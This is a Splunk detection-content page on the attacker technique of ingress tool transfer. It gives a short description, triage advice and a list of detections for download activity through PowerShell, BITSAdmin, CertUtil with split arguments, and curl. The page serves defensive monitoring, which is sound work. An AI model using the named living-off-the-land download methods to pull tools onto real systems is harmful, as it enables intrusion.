Try in Splunk Security Cloud

Description

Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-03-24
  • Author: Michael Haag, Splunk
  • ID: b3782036-8cbd-11eb-9d8e-acde48001122

Narrative

Ingress tool transfer is a Technique under tactic Command and Control. Behaviors will include the use of living off the land binaries to download implants or binaries over alternate communication ports. It is imperative to baseline applications on endpoints to understand what generates network activity, to where, and what is its native behavior. These utilities, when abused, will write files to disk in world writeable paths.\ During triage, review the reputation of the remote public destination IP or domain. Capture any files written to disk and perform analysis. Review other parrallel processes for additional behaviors.

Detections

Name Technique Type
Any Powershell DownloadFile PowerShell TTP
Any Powershell DownloadString PowerShell TTP
BITSAdmin Download File BITS Jobs, Ingress Tool Transfer TTP
CertUtil Download With URLCache and Split Arguments Ingress Tool Transfer TTP
CertUtil Download With VerifyCtl and Split Arguments Ingress Tool Transfer TTP
Suspicious Curl Network Connection Ingress Tool Transfer TTP

Reference

source | version: 1